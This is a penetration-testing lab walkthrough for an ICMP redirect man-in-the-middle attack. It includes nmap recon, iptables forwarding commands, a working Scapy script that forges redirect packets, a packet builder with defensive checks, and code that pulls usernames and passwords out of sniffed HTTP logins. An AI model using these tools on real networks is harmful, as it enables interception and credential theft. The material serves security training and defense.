
© 2018 Caendra, Inc. - Hera For PTP - ICMP Redirect Attack

This document describes how to perform an ICMP redirect man-in-the-middle attack against network traffic. It provides instructions on identifying the client and server networks and machines, configuring the attack system as a router, using Scapy to generate ICMP redirect packets, and intercepting traffic with Wireshark to obtain credentials for a web administration panel.

In this lab scenario you have to mount a man in the middle interception attack against the
communication between a client and a server.

There are two networks:

• The client network, where you sit alongside the victim client machine
• The server network

Here is the lab environment:

The network has been hardened to prevent the use of ARP-spoofing-based attacks. So, you have to find
another technique to use.

The client machine is using a web administration panel. Your goals are:

• Find the web administration panel
• Identify the client machine
• Steal some valid credentials for the web administration panel


In this lab you will learn:

• How to mount an innovative MITM attack
• How ICMP redirect packets work
• How to use scapy to create raw network packets
• How to use the routing and firewalling features of the Linux kernel

The best tool is your brain. Then you may need some of:

• Nmap
• Web Browser
• Wireshark
• Scapy
• A Linux machine

This is an educational challenge, so some of the following tasks will have some extra information to
guide you during the attack.

Identify the server and client networks. Identify the victim client and the target server.


Issuing the following commands turns your machine into a router for the victim's traffic. The first
enables IP forwarding, so the packets the victim sends to you for the server are passed on to the real
router instead of being dropped. The second NATs the victim's address behind yours (MASQUERADE): the
router and the server then see your address rather than the victim's, so the server's replies come back
through you too instead of being delivered straight to the victim, and you capture both directions of
the conversation:

# echo 1 > /proc/sys/net/ipv4/ip_forward

# iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE

The -s 10.100.13.0/255.255.255.0 match is the client network identified in the first task; tap0 is the
VPN interface through which both the client and the server networks are reached.

You can use the following scapy script to mount an ICMP redirect attack:

#!/usr/bin/env python
# Creating and sending ICMP redirect packets
from scapy.all import IP, ICMP, TCP, send
import time

originalRouterIP='<The router IP address>'
attackerIP='<Your VPN IP Address>'
victimIP='<The Victim IP Address>'
serverIP='<The Web Server IP Address>'

# We create an ICMP Redirect packet. It must appear to come from the
# victim's current gateway, or the victim silently discards it (RFC 1122).
ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5   # Redirect
icmpRedirect.code=1   # Redirect datagrams for the host (only traffic to serverIP)
icmpRedirect.gw=attackerIP   # the "better" next hop: our own on-link address

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victimIP (RFC 792: the quoted IP header plus at least 8 bytes)
redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP
fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

# Keep resending: a single packet may be lost and the redirected route
# entry on the victim expires after a while (a one-second pause is enough)
while True:
    send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
    time.sleep(1)
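To show exactly what the script above puts on the wire, and what the victim checks before honouring it, here is an added example (not code from the lab manual) that builds and decodes the same redirect with nothing but the Python standard library. The addresses are the ones found in this lab (router 10.100.13.1, attacker 10.100.13.20, victim 10.100.13.126, server 10.23.56.100). redirect_is_acceptable mirrors the RFC 1122 host rules, which the forged packet passes because its source is spoofed and the attacker is on-link; its accept_redirects and known_gateways parameters stand for the Linux sysctls net.ipv4.conf.all.accept_redirects and secure_redirects, and redirect_alerts is a hypothetical sensor rule, not a tool the lab uses.

```python
"""
ICMPv4 Redirect (type 5) builder, decoder and host-side acceptance check,
standard library only.  Added example, not code from the Hera lab manual.
Addresses are the ones found in this lab: router 10.100.13.1, attacker
10.100.13.20, victim 10.100.13.126, web server 10.23.56.100.
"""
import ipaddress
import struct

ICMP_REDIRECT = 5
REDIRECT_HOST = 1          # code 1: redirect datagrams for this one host (the server)


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum, as used by IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int, ttl: int = 64) -> bytes:
    """20-byte IPv4 header without options, header checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_redirect(router: str, victim: str, new_gw: str, server: str,
                   sport: int = 55555, dport: int = 80, seq: int = 444444444) -> bytes:
    """Forge the lab's packet: IP(router->victim)/ICMP(5,1,gw)/IP(victim->server)/TCP SYN.

    RFC 792 requires the quoted IP header plus 8 bytes; like the scapy script we
    quote the whole 20-byte SYN (TCP checksum left 0, nobody verifies it in a quote).
    """
    tcp_syn = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 8192, 0, 0)
    quoted = ipv4_header(victim, server, 6, len(tcp_syn)) + tcp_syn
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, REDIRECT_HOST, 0,
                       ipaddress.IPv4Address(new_gw).packed)
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp + quoted)) + icmp[4:]
    return ipv4_header(router, victim, 1, len(icmp) + len(quoted)) + icmp + quoted


def parse_redirect(pkt: bytes):
    """Decode an IPv4 ICMP Redirect; None if pkt is not one or a checksum is wrong."""
    if len(pkt) < 28 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1 or checksum(pkt[:ihl]) != 0:          # not ICMP, or corrupt IP header
        return None
    icmp = pkt[ihl:]
    if len(icmp) < 28 or icmp[0] != ICMP_REDIRECT or checksum(icmp) != 0:
        return None
    inner = icmp[8:]                                     # quoted original datagram
    return {
        "src": str(ipaddress.IPv4Address(pkt[12:16])),
        "dst": str(ipaddress.IPv4Address(pkt[16:20])),
        "code": icmp[1],
        "gateway": str(ipaddress.IPv4Address(icmp[4:8])),
        "inner_src": str(ipaddress.IPv4Address(inner[12:16])),
        "inner_dst": str(ipaddress.IPv4Address(inner[16:20])),
        "inner_proto": inner[9],
    }


def redirect_is_acceptable(fields, host_ip: str, current_gw: str, link: str,
                           accept_redirects: bool = True, known_gateways=None) -> bool:
    """The checks a host applies before changing its route (RFC 1122 section 3.2.2.2).

    accept_redirects=False models net.ipv4.conf.all.accept_redirects=0 on Linux or
    EnableICMPRedirect=0 on Windows: every redirect is dropped.  known_gateways
    models Linux secure_redirects=1 (when not overridden by shared_media): the new
    gateway must already be a known gateway.
    """
    if not accept_redirects:
        return False
    if fields["src"] != current_gw:              # must come from the current first hop
        return False
    if fields["inner_src"] != host_ip:           # the quoted datagram must be ours
        return False
    if ipaddress.ip_address(fields["gateway"]) not in ipaddress.ip_network(link):
        return False                             # new gateway must be on-link
    if known_gateways is not None and fields["gateway"] not in known_gateways:
        return False
    return True


def redirect_alerts(fields, known_routers) -> list:
    """Hypothetical sensor rule: flag a redirect naming a gateway that is not a known router."""
    alerts = []
    if fields["gateway"] not in known_routers:
        alerts.append("redirect from %s tells %s to reach %s via unknown gateway %s"
                      % (fields["src"], fields["dst"], fields["inner_dst"], fields["gateway"]))
    return alerts


if __name__ == "__main__":
    pkt = build_redirect("10.100.13.1", "10.100.13.126", "10.100.13.20", "10.23.56.100")
    f = parse_redirect(pkt)
    print(f)
    # The lab victim (default settings) installs the route; with accept_redirects=0 it would not.
    print(redirect_is_acceptable(f, "10.100.13.126", "10.100.13.1", "10.100.13.0/24"))
    print(redirect_is_acceptable(f, "10.100.13.126", "10.100.13.1", "10.100.13.0/24",
                                 accept_redirects=False))
    print(redirect_alerts(f, {"10.100.13.1"}))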


Intercept the traffic exchanged between the victim machine and the target server and use it to get
access to the web administration interface.

Use the credentials found in the previous step to log in to the web administration panel.

First of all, you have to identify the networks you can reach:

# ip route show dev tap0


10.23.56.0/24 via 10.100.13.1
10.100.13.0/24 proto kernel scope link src 10.100.13.20

So 10.100.13.0/24 is the client network you are sitting on (your address is 10.100.13.20) and
10.23.56.0/24 is the server network, reachable through the router 10.100.13.1. Both are behind the same
tap0 interface, which is why the NAT rule later uses -o tap0.

Then you have to identify the live machines:

# nmap -sn -n 10.23.56.0/24 10.100.13.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-09 16:20 CET


Nmap scan report for 10.23.56.1
Host is up (0.27s latency).
Nmap scan report for 10.23.56.100
Host is up (0.17s latency).
Nmap scan report for 10.100.13.1
Host is up (0.15s latency).
MAC Address: C8:4C:75:AA:5C:E5 (Cisco Systems)
Nmap scan report for 10.100.13.126
Host is up (0.21s latency).
MAC Address: 00:02:B3:CD:97:2C (Intel)
Nmap scan report for 10.100.13.20
Host is up.
Nmap done: 512 IP addresses (5 hosts up) scanned in 22.65 seconds


Identify the victim and the server:

# nmap -sS -sV -n 10.23.56.100 10.100.13.126

Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-09 16:27 CET


Nmap scan report for 10.23.56.100
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.100.13.126


Host is up (0.16s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open netbios-ssn
3389/tcp open ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:02:B3:CD:97:2C (Intel)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at


http://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 72.95 seconds


Since the 10.23.56.100 machine has an Apache service listening on port 80, it is clearly the server.
You can verify that by pointing your browser at its address.

The other host, 10.100.13.126, is on your own segment (Nmap reported its MAC address, which it can
only do for on-link hosts) and looks like a Windows client, so you can gather more information via SMB:

# nmap -sS -n --script smb-os-discovery 10.100.13.126

Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-09 16:30 CET


Nmap scan report for 10.100.13.126

Host script results:


| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: els-PC
| NetBIOS computer name: ELS-PC
| Workgroup: WORKGROUP
|_ System time: 2015-11-09T07:29:37-08:00

Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds


You have to launch the following commands to setup your computer:

# echo 1 > /proc/sys/net/ipv4/ip_forward


# iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE

Edit the four address values at the top of the script from this manual (router, victim, server and your
own VPN address), then either run it with python or launch scapy and paste the script into the interactive
prompt to start the attack. Remember that the redirect must claim to come from the victim's current
gateway (10.100.13.1 here) and must name a gateway on the victim's own subnet (your address); otherwise
the victim discards it.

The script should begin sending packets, and you should see something like the following:

root@tester:~/LABS/21# scapy
Welcome to Scapy (2.3.3)
>>> # Creating and sending ICMP redirect packets
<snip>
>>> # The ICMP packet payload /should/ contain the original TCP SYN packet
>>> # sent from the victimIP
>>> redirPayloadIP=IP()
>>> redirPayloadIP.src=victimIP
>>> redirPayloadIP.dst=serverIP
>>> fakeOriginalTCPSYN=TCP()
>>> fakeOriginalTCPSYN.flags="S"
>>> fakeOriginalTCPSYN.dport=80
>>> fakeOriginalTCPSYN.seq=444444444
>>> fakeOriginalTCPSYN.sport=55555
>>>
>>> while True:
... send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
... # Press <enter>
...
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
<snip>


Launch Wireshark on the tap0 interface and start sniffing. If everything is configured correctly, you
will see the victim's HTTP traffic passing through your machine.

Hint: filter out the ICMP redirects generated by scapy with the !icmp display filter, or use the http
filter to show only the web traffic:


If you run Follow TCP Stream on the login request you will see the full username and password pair in
cleartext:
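What Follow TCP Stream shows is just the reassembled request bytes; the credentials still have to be picked out of them. The following is an added example (not part of the lab manual) that does that for the forms a cleartext web login usually takes: an HTTP Basic Authorization header, a form-encoded POST body, or a query string. The sample request embedded in it is constructed for the example; the path, the field names and the admin/s3cret pair are illustrative, and only the server address 10.23.56.100 comes from the lab.

```python
"""
Pull a login out of a reassembled cleartext HTTP request, i.e. the client->server
bytes that Wireshark's "Follow TCP stream" displays.  Added example, not code from
the lab manual; the sample request below is constructed, not captured.
"""
import base64
from urllib.parse import parse_qs, urlsplit

# Form field names commonly used for credentials; extend for the target application.
CREDENTIAL_FIELDS = {"username", "user", "login", "email", "password", "pass", "passwd", "pwd"}


def parse_http_request(stream: bytes):
    """Split one HTTP/1.x request into (method, target, headers, body), honouring Content-Length."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    body = rest[: int(headers.get("content-length", "0"))]
    return method, target, headers, body


def _credential_fields(encoded: str) -> dict:
    """Keep only the credential-looking keys of a urlencoded string (first value each)."""
    form = parse_qs(encoded, keep_blank_values=True)
    return {k: v[0] for k, v in form.items() if k.lower() in CREDENTIAL_FIELDS}


def extract_credentials(stream: bytes) -> dict:
    """Return every credential found: Basic auth header, POST form body, or query string."""
    method, target, headers, body = parse_http_request(stream)
    found = {}
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        user, _, pwd = base64.b64decode(auth[6:]).decode("utf-8", "replace").partition(":")
        found["basic_auth"] = (user, pwd)
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        found.update(_credential_fields(body.decode("utf-8", "replace")))
    found.update(_credential_fields(urlsplit(target).query))   # credentials leaked in the URL
    return found


# Constructed sample of what Follow TCP Stream would show (not a capture from the lab):
SAMPLE_LOGIN = (
    b"POST /admin/login.php HTTP/1.1\r\n"
    b"Host: 10.23.56.100\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 30\r\n"
    b"\r\n"
    b"username=admin&password=s3cret"
)

if __name__ == "__main__":
    print(extract_credentials(SAMPLE_LOGIN))
```

The same function can be run over every client-to-server stream exported from a capture (File > Export Objects or tshark -z follow), which is how you would triage a large pcap rather than following streams one by one.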


Now you can use those credentials to access the administration page:
